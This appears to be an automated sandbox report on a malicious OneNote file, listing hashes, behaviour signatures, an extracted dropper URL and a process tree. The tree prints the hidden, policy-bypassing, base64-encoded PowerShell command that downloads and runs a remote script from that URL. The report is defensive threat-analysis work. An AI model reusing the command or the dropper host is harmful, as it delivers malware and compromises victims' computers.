Analysis

  • max time kernel
    150s
  • max time network
    82s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    02/02/2023, 21:10

General

  • Target

    12c4d9eddce807d10e3578fcf2918366def586ec374a35957880a65dbd467efc.one

  • Size

    264KB

  • MD5

    3431b5db65041c5c495deaf3a6c74006

  • SHA1

    7a5ce0bf1d336f8d7b0a41d4e71327549f827c71

  • SHA256

    12c4d9eddce807d10e3578fcf2918366def586ec374a35957880a65dbd467efc

  • SHA512

    645db443ae98c50b4d336a26b684eb93eb4e6934df3adc82eec2bd1d502ea3c1bd89230e82fc83f6f20b33da96343926994e7f3af7df9406c76b1387989978f4

  • SSDEEP

    3072:raA0YRw9/WITtTWR7IbNzvL1aaIuWt4AJERnyNenUWHCoTCCCCCCCCCCCCCCCCCv:ba9xytedL1dy4iERBBf3yBLTlz

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://restlomik.com/gatef.php

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies registry class 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\Admin\AppData\Local\Temp\12c4d9eddce807d10e3578fcf2918366def586ec374a35957880a65dbd467efc.one"
    1⤵
    • Deletes itself
    • Drops startup file
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:908
    • C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
      /tsr
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1572
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\Open.hta"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1684
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBlAHMAdABsAG8AbQBpAGsALgBjAG8AbQAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1916
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBlAHMAdABsAG8AbQBpAGsALgBjAG8AbQAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:308
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\1\Open.hta"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:572
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBlAHMAdABsAG8AbQBpAGsALgBjAG8AbQAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1076
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBlAHMAdABsAG8AbQBpAGsALgBjAG8AbQAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1800

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\Open.hta

    Filesize

    23KB

    MD5

    1227434bf06a35a7b25b95fd141510d0

    SHA1

    4047c8e1cefe81f16fdc519d020e3b3a47d686e8

    SHA256

    915eca47e23e62c007898c6c29fbe8e503bd31b1387f23804c9a2babfbee62c5

    SHA512

    ce0236c7898a7216158c4a980748492a824846fd58868dfc83cbe56f1f1dd8203f6ec823ec7e318265be2305fa5c401e175c1a1452586147496c8e0a35cb804d

  • C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\1\Open.hta

    Filesize

    23KB

    MD5

    1227434bf06a35a7b25b95fd141510d0

    SHA1

    4047c8e1cefe81f16fdc519d020e3b3a47d686e8

    SHA256

    915eca47e23e62c007898c6c29fbe8e503bd31b1387f23804c9a2babfbee62c5

    SHA512

    ce0236c7898a7216158c4a980748492a824846fd58868dfc83cbe56f1f1dd8203f6ec823ec7e318265be2305fa5c401e175c1a1452586147496c8e0a35cb804d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    4dadf2509816b83be10726d128bed098

    SHA1

    ba570a8dcfcb848fda968d762b881952c53b8d90

    SHA256

    93f8e6e8993462920ce68651c1a21472c45a6f09c841e56deb1a6c6eadc6eb0d

    SHA512

    00c828e40e4546a7d2b28d2addb62dfe833d70f5ea7eb9b6a0441876c7e2754d0b4ebfdde0ac71e102d1c58969d3348e83ed0430ae9298038aaacc1e162429b6

  • memory/308-65-0x000000006BAB0000-0x000000006C05B000-memory.dmp

    Filesize

    5.7MB

  • memory/308-66-0x000000006BAB0000-0x000000006C05B000-memory.dmp

    Filesize

    5.7MB

  • memory/908-55-0x000000007341D000-0x0000000073428000-memory.dmp

    Filesize

    44KB

  • memory/908-59-0x000000007341D000-0x0000000073428000-memory.dmp

    Filesize

    44KB

  • memory/908-56-0x0000000075C81000-0x0000000075C83000-memory.dmp

    Filesize

    8KB

  • memory/908-54-0x0000000072431000-0x0000000072433000-memory.dmp

    Filesize

    8KB

  • memory/1800-74-0x000000006BA30000-0x000000006BFDB000-memory.dmp

    Filesize

    5.7MB